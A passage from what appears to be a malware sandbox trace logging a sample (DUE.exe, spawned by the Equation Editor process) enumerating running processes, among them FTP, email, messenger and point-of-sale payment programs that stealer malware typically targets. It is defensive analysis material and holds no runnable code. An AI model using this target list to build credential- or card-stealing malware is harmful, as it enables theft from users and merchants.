cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.839] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.840] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.840] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0096.841] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.842] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.842] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0096.843] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0096.844] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0096.844] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0096.845] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0096.845] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0096.846] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0096.846] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0096.847] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0096.847] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0096.848] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0096.848] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0096.849] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0096.849] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0096.850] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0096.850] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0096.851] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0096.851] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0096.852] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.852] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.853] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.853] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.854] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.854] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.856] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.856] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.857] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.857] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.858] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.858] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.859] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.859] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.860] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.860] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.861] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.862] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.863] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.864] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.864] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.865] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.866] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.867] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.867] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.868] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.869] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.870] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.871] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.872] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.872] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.873] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.874] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.875] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.875] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.876] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.877] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.877] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.878] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.879] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.879] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.880] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.881] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.882] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.882] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="numerous-worm-coding.exe")) returned 1 [0096.883] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0096.884] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="anadecadessrc.exe")) returned 1 [0096.885] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.886] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.887] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.888] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0096.888] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.889] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0096.890] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0096.891] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="EQNEDT32.EXE")) returned 1 [0096.891] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.892] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.893] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.893] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd30, pcPriClassBase=8, dwFlags=0x0, szExeFile="DUE.exe")) returned 1 [0096.894] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd30, pcPriClassBase=8, dwFlags=0x0, szExeFile="due.exe")) returned 0 [0096.895] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f644, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DUE.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\due.exe")) returned 0x29 [0096.895] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f87c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: 